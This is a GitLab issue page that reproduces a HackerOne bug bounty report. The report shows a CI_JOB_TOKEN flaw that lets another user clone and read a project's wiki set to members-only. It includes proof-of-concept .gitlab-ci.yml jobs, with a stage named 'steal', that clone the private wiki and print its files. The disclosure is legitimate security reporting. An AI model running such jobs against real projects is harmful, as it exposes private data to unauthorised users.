Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #297282
Closed
Open
Issue created Jan 11, 2021 by GitLab SecurityBot@gitlab-securitybotReporter

Backend: Able to git the wiki despite of the Only Project Members setting

HackerOne report #1075586 by shells3c on 2021-01-10, assigned to @rchan-gitlab:

Report | How To Reproduce

Report

Summary

There was a problem by mistake while confirming the patch for the Wiki bug in the past report: #887755, and the fact that the bug is still there! I am able to git private wiki using the CI_JOB_TOKEN (public project)

Steps to reproduce
  1. Create a project, set the Wiki visibility to Only Project Members in the setting page: https://gitlab.com/<user>/<project>/edit
  2. Login as another user (attacker), create .gitlab-ci.yml in an arbitrary project:
stages:      
  - steal  
test:      
  stage: steal  
  script:      
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git'  
    - 'cd api.wiki && cat api-doc.md'  
  1. In the pipeline output, you will able to read the content
Examples
  • Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
  • Try adding the following in your .gitlab-ci.yml and read the wiki:
stages:      
  - steal  
test:      
  stage: steal  
  script:      
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git'  
    - 'cd api.wiki'  
    - 'ls'  
    - 'cat home.md'  

Impact

Able to read the private Wiki of Gitlab projects

How To Reproduce

Please add reproducibility information to this section:

Edited Apr 14, 2022 by Mark Nuzzo
Assignee
Assign to
Time tracking